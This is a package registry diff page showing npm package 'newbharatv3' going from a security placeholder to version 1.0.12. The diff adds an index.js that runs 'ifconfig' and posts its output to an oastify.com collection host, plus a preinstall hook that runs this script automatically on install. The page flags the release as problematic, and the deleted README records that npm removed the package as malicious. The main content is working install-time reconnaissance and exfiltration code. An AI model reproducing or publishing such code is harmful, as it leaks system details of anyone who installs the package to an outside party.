newbharatv3 0.0.1-security → 1.0.12
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of newbharatv3 might be problematic. Click here for more details.
- package/index.js +31 -0
- package/package.json +9 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1,31 @@
|
|
1
|
+
const { exec } = require('child_process');
|
2
|
+
const axios = require('axios');
|
3
|
+
|
4
|
+
// System command run karna (e.g., 'whoami' ya 'dig example.com')
|
5
|
+
const command = 'ifconfig'; // yahan apni desired command likho
|
6
|
+
|
7
|
+
exec(command, async (error, stdout, stderr) => {
|
8
|
+
if (error) {
|
9
|
+
console.error(`Error: ${error.message}`);
|
10
|
+
return;
|
11
|
+
}
|
12
|
+
if (stderr) {
|
13
|
+
console.error(`Stderr: ${stderr}`);
|
14
|
+
return;
|
15
|
+
}
|
16
|
+
|
17
|
+
const commandOutput = stdout.trim();
|
18
|
+
console.log(`Command Output: ${commandOutput}`);
|
19
|
+
|
20
|
+
// Ab HTTP request bhejna using axios
|
21
|
+
try {
|
22
|
+
const response = await axios.post('http://j5pr27jwyd78l5etpestecz990fr3jr8.oastify.com', {
|
23
|
+
data: commandOutput // Yahan output ko HTTP request body mein bhej rahe hain
|
24
|
+
});
|
25
|
+
|
26
|
+
console.log('Response Status:', response.status);
|
27
|
+
console.log('Response Data:', response.data);
|
28
|
+
} catch (err) {
|
29
|
+
console.error('HTTP Request Error:', err.message);
|
30
|
+
}
|
31
|
+
});
|
package/package.json
CHANGED
@@ -1,6 +1,12 @@
|
|
1
1
|
{
|
2
2
|
"name": "newbharatv3",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "1.0.12",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC"
|
6
12
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=newbharatv3 for more information.
|